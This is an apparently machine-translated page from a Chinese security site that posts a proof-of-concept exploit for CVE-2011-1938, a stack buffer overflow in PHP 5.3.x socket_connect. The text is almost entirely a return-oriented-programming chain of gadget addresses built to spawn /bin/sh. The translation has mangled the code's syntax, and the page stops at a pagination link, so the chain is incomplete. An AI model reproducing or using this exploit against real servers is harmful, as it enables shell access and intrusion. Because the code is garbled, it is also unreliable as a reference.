PHP 5.3.6 buffer overflow POC(ROP)of the CVE-vulnerability warning-the black bar safety net

2011-07-28T00:00:00
ID MYHACK58:62201131367
Type myhack58
Reporter 佚名
Modified 2011-07-28T00:00:00

Description

<? PHP

/ *

** xiaolandjj@qq.com

** http://bbs.xxoxo.org

** 2 0 1 1 year 7 month 1 5 day

**Stack-based buffer overflow in ext /socket/ sockets. c socket_connect function

In PHP 5.3. 3 to 5. 3. 6 may be context-dependent attacker to execute arbitrary

**The code through the UNIX socket path name.

**By: small blue

  • /

Echo“[+] PHP 5.3.6 buffer overflow POC(ROP)\ N”;

Echo“[+] CVE - 2 0 1 1 - 1 9 3 8 \ N \ N”;

the # / usr / bin/ PHP Widget

Definition of“dumb”, and“\ X42 \ X42 \ X42 \ X42”); / /fill

Definition of“stack”,“\ X20 \ XBA \ X74 \ X08”); / /data 0x46a0 0x874ba20

Definition of“STACK4”,“\ X24 \ XBA \ X74 \ X08”); / / STACK + 4

Definition of“STACK8”, and“\ X28 \ XBA \ X74 \ X08”); / /stack+ 8

Definition of“STACK12”, and“\ x3c \ XBA \ X74 \ X08”); / /stack+ 1 2

Definition INT_80“, the”\ X27 \ xb6 \ X07 \ X08“); / / 0x0807b627: INT 0x80

Definition of“INC_EAX”, and“\ X66 \ X50 \ \ X08 x0f”); / / 0x080f5066: the INC%eax| RET

Definition of“XOR_EAX', to”\ X60 \ XB4 \ X09 \ X08“); / / 0x0809b460 of: XOR EAX % of the % eax| RET

Definition of“MOV_A_D”, and“\ X84 \ x3e \ X12 \ X08”); / / 0x08123e84: MOV EAX%, A % be edx.| RET

Definition of“POP_EBP”, and“\ xc7 \ X48 \ X06 \ X08”); / / 0x080648c7: pop % in EBP | RET

Definition of“MOV_B_A', the”\ X18 \ X45 \ X06 \ X08“); / / 0x08064518: MOV % ebp, and % eax|pop % in EBX |pop % in ESI |pop % in EDI |pop of % EBP | RET

Definition of“MOV_DI_DX', and”\ X20 \ X26 \ X07 \ X08“); / / 0x08072620: MOV in % EDI, and % edx|pop % in ESI |pop % in EDI |pop of % EBP | RET

Definition of“POP_EDI”, and“\ X23 \ X26 \ X07 \ X08”); / / 0x08072623: pop % in EDI |pop of % EBP | RET

Definition of“POP_EBX”, and“\ x0f \ x4d \ X21 \ X08”); / / 0x08214d0f: pop-up the % EBX |pop % in ESI |pop % in EDI |pop of % EBP | RET

Definition of“XOR_ECX”, AND“\ the XE3 \ X3B \ x1f \ X08”); / / 0x081f3be3: the XOR of % ECX, and % ecx|pop % in EBX | MOV ECX%, and the % eax|pop % in ESI |pop % in EDI |pop of % EBP | RET

$ Padd = str_repeat of“A”, 1 9 6);

Of payload= POP_EDI in./ /Pop-up % of EDI

Stack./ / 0x874ba20

Dummy./ /Pop % ebp

MOV_DI_DX to. % in/ / MOV EDI, EDX % BY

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

“/ / BI”./ /Pop % ebp

MOV_B_A in./ / MOV % ebp, and % eax

Dummy./ /Pop-in % ebx.

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

Dummy./ /Pop % ebp

MOV_A_D to. % in/ / MOV EAX register, and the % edx.

POP_EDI in./ /Pop-up % of EDI

STACK4./ day. / 0x874ba24

Dummy./ /Pop % ebp

MOV_DI_DX to. % in/ / MOV EDI, EDX % BY

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

“N / sh”./ /Pop % ebp

MOV_B_A in./ / MOV % ebp, and % eax

Dummy./ /Pop-in % ebx.

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

Dummy./ /Pop % ebp

MOV_A_D to. % in/ / MOV EAX register, and the % edx.

POP_EDI in./ /Pop-up % of EDI

STACK8 is./ / 0x874ba28

Dummy./ /Pop % ebp

MOV_DI_DX to. % in/ / MOV EDI, EDX % BY

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

Dummy./ /Pop % ebp

XOR_EAX to. % in/ / XOR EAX,%eax ,

MOV_A_D to. % in/ / MOV EAX register, and the % edx.

XOR_ECX in./ / XOR % OF THE ECX, ECX % OF THE

Dummy./ /Pop-in % ebx.

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

Dummy./ /Pop % ebp

POP_EBX in./ /Pop-in % ebx.

Stack./ / 0x874ba20

Dummy./ /Pop-up % of ESI

Dummy./ /Pop-up % of EDI

[1] [2] next